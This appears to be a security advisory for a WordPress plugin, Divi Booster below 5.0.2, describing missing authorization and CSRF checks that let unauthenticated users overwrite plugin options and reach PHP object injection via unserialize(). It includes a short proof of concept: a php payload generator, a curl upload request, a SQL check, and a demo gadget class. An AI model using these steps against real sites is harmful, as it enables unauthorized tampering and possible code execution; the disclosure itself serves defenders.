Divi Booster < 5.0.2 – Unauthenticated PHP Object Injection | CVE 2026-2626

Description

The plugin does not have authorization and CSRF checks in one of its fixing function, allowing unauthenticated users to modify stored plugin options. Furthermore, due to the use of unserialize() on the data, this could be further exploited when combined with a PHP gadget chain to achieve PHP Object Injection

Proof of Concept

Requirement:
- The Divi theme active
- The settings (/wp-admin/admin.php?page=wtfdivi_settings) need to have been saved at least once (this is to activate the fix from the plugin)

### Step 1 Create payload

php -r '$p=["poc"=>"owned"]; echo gzencode(serialize($p));' > poc.conf

### Step 2 Send unauthenticated request

curl -i -X POST https://example.com \
  -F "uploaded_file=@poc.conf;type=application/octet-stream"

### Step 3 Verify option update

check the following option wtfdivi, example:

SELECT option_value  FROM wp_options  WHERE option_name = 'wtfdivi';

For the PHP Object injection, have the following class on the blog:

class Evil {
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}

Then generate the file with php -r 'echo gzencode("O:4:\"Evil\":0:{}");' > poc.conf

and Upload it the same way as above